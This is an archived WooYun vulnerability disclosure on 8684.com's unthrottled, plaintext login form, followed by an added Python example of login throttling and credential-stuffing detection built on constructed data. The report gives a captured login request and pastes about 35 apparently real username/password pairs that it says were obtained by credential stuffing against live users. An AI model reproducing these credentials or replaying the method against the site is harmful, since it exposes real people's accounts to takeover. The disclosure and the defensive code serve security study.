WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online browsing -------- http://drop.zone.ci/
2015-11-02: Details have been sent to the vendor and are awaiting processing. 2015-11-07: The vendor has actively ignored the vulnerability; the details are now public.
8684 bus main site: the login form has a design flaw that allows credential stuffing against site users
The login form on the main site http://www.8684.com has no limit on login attempts:
Captured request; the username and password are transmitted in plaintext:
POST /8684/ajax.php?cmd=ajlogin HTTP/1.1
Host: passport.8684.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://passport.8684.com/8684/login_b_v2.php?ref=http%3A%2F%2Fshenzhen.8684.com%2Fdo%3Fgoback%3Dhttp%253A%252F%252Fwww.8684.com%252F&&f5=0&v=1446356475873
Content-Length: 114
Cookie: ref=http%3A%2F%2F1212.8684.com%2F; CNZZDATA1253415922=710293042-1446106816-http%253A%252F%252Fpassport.8684.com%252F%7C1446351553; noMoreLoginTips=yes; qu_city=501; Hm_lvt_5995ef2848d06328473f975e9d062263=1446356474; Hm_lpvt_5995ef2848d06328473f975e9d062263=1446356474; shuang11=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

name=aaaaaaaaa&pass=aaaaaaaa&log=1&ref=http%3A%2F%2Fshenzhen.8684.com%2Fdo%3Fgoback%3Dhttp%3A%2F%2Fwww.8684.com%2F
Tested credential stuffing against site users; the successful accounts are pasted directly here as proof (username, password, and the number that accompanies each pair in the original tool output, which is not labelled there):

username        password      n
1234            1234          1090
wenchuanbo88    wenchuanbo88  1102
caokangli       841127        1105
kk1431          10160214      1107
fhisd           71258691      1110
zllajj          zllajj        1119
tzbr            zj19890922    1121
mkd888          111111        1123
gindal          keylink       1123
musicmh         511323        1124
lyjbenny        7512231       1125
hongtaowdf      962464        1127
sxj588          6360588       1128
lhplee          lhp875484     1128
snrwcwt         yangjun       1129
lyf2614         261433289     1129
yyytttt         yyytttt       1129
emoshen         zhanqiang     1129
softwarely      cinderella    1132
ruixiang123     123456        1133
akenzhou        19851202      1136
lylyv           4661879879    1140
dsfa            123456        1144
lingaoyun       lingaoyun     1149
bn922           123456        1150
andydm          810409        1150
ipwisk          73156711      1151
lxhuiok         lxhuiok       1152
jeffow          456123        1152
leon_wyh        wanyihong     1153
vashlang        860421        1153
weilai0329      weilai123     1155
shuaihong617    137566        1157
kimigao         8566665       1168
luoxiao94       19861004      1311
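The two findings above (an unthrottled login endpoint, and a replayed username/password list that keeps answering until real accounts match) are easiest to reason about with a small working model. The block below is an added example written for this page; it is not code from the WooYun report or from 8684.com. It shows a login gate that throttles failed attempts per source IP and per target account, drives it with a constructed stuffing list of the kind the report replayed, and then picks the stuffing source out of constructed login-log lines. The user store, passwords, limits, IP addresses and log format are all assumptions for the example; transport protection (serving the form and the POST over TLS, which the plaintext capture above lacks) is a separate fix and is not modelled here.

```python
"""Added example: login throttling and credential-stuffing detection.

Not code from the WooYun report or from 8684.com.  Everything below
(users, passwords, limits, IPs, log format) is constructed for the demo.
"""
import hashlib
import hmac
import re
from collections import defaultdict, deque


def _hash(password: str, salt: bytes) -> bytes:
    # Iteration count kept low so the demo runs quickly; use far more in production.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 2_000)


# Constructed user store: name -> (salt, hash).  No relation to real 8684 users.
USERS = {
    "alice": (b"salt-alice", _hash("correct horse battery", b"salt-alice")),
    "bob": (b"salt-bob", _hash("123456", b"salt-bob")),
}
_DUMMY = (b"salt-dummy", _hash("x", b"salt-dummy"))  # hashed for unknown names


class LoginGate:
    """Sliding-window failure throttle keyed by source IP and by account."""

    def __init__(self, ip_limit=20, account_limit=5, window=300):
        self.ip_limit, self.account_limit, self.window = ip_limit, account_limit, window
        self.ip_fail = defaultdict(deque)    # ip   -> timestamps of failures
        self.acct_fail = defaultdict(deque)  # name -> timestamps of failures

    def _prune(self, dq, now):
        while dq and dq[0] <= now - self.window:
            dq.popleft()

    def login(self, ip, name, password, now):
        ipq, aq = self.ip_fail[ip], self.acct_fail[name]
        self._prune(ipq, now)
        self._prune(aq, now)
        # Refuse before checking the password, so a throttled caller learns nothing.
        if len(ipq) >= self.ip_limit or len(aq) >= self.account_limit:
            return "throttled"
        salt, stored = USERS.get(name, _DUMMY)  # unknown names cost the same time
        match = hmac.compare_digest(_hash(password, salt), stored)
        if match and name in USERS:
            aq.clear()
            return "ok"
        ipq.append(now)
        aq.append(now)
        return "denied"


# Constructed "leaked" list replayed from one IP, the way the report's tool did.
STUFFING_LIST = [(f"user{i:02d}", f"pw{i:02d}") for i in range(25)] + [("bob", "123456")]


def replay(gate, ip, pairs, start=1_000.0, gap=0.5):
    """Fire every pair from one IP and count the outcomes."""
    counts = {"ok": 0, "denied": 0, "throttled": 0}
    for i, (name, pw) in enumerate(pairs):
        counts[gate.login(ip, name, pw, start + i * gap)] += 1
    return counts


LOG_RE = re.compile(r"^(?P<ts>\S+) ip=(?P<ip>\S+) name=(?P<name>\S+) result=(?P<res>\w+)$")

# Constructed log lines in an assumed format; one IP sprays many accounts.
SAMPLE_LOG = [
    f"2015-11-02T10:00:{i:02d} ip=203.0.113.9 name=user{i:02d} result=denied" for i in range(12)
] + [
    "2015-11-02T10:00:30 ip=203.0.113.9 name=bob result=ok",
    "2015-11-02T10:01:00 ip=198.51.100.4 name=alice result=denied",
    "2015-11-02T10:01:05 ip=198.51.100.4 name=alice result=ok",
]


def flag_stuffing_ips(lines, min_accounts=10, min_fail_ratio=0.8):
    """Return IPs that tried many distinct accounts and mostly failed."""
    accounts, attempts, fails = defaultdict(set), defaultdict(int), defaultdict(int)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip = m["ip"]
        accounts[ip].add(m["name"])
        attempts[ip] += 1
        fails[ip] += m["res"] != "ok"
    return sorted(ip for ip in attempts
                  if len(accounts[ip]) >= min_accounts
                  and fails[ip] / attempts[ip] >= min_fail_ratio)


if __name__ == "__main__":
    print("unthrottled:", replay(LoginGate(10**9, 10**9), "203.0.113.9", STUFFING_LIST))
    print("throttled:  ", replay(LoginGate(), "203.0.113.9", STUFFING_LIST))
    print("flagged IPs:", flag_stuffing_ips(SAMPLE_LOG))
```

With the limits switched off (the report's situation) the replay reaches the one valid pair in the list; with the default limits the source IP is cut off after 20 failures and the valid pair is never tried. The per-account limit has a cost the report does not discuss: once an account has accumulated five failures in the window, even its real owner is refused until the window expires, so in practice that limit is usually paired with a CAPTCHA or a second factor rather than a hard refusal. The log-side check is deliberately coarse (many distinct usernames from one address, almost all failing) and is the signal that would have shown this test running against the live endpoint.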
Suggested fix: encryption.
Severity: no impact (vendor ignored)
Ignored on: 2015-11-07 11:10
Vulnerability Rank: 4 (WooYun rating)
None yet.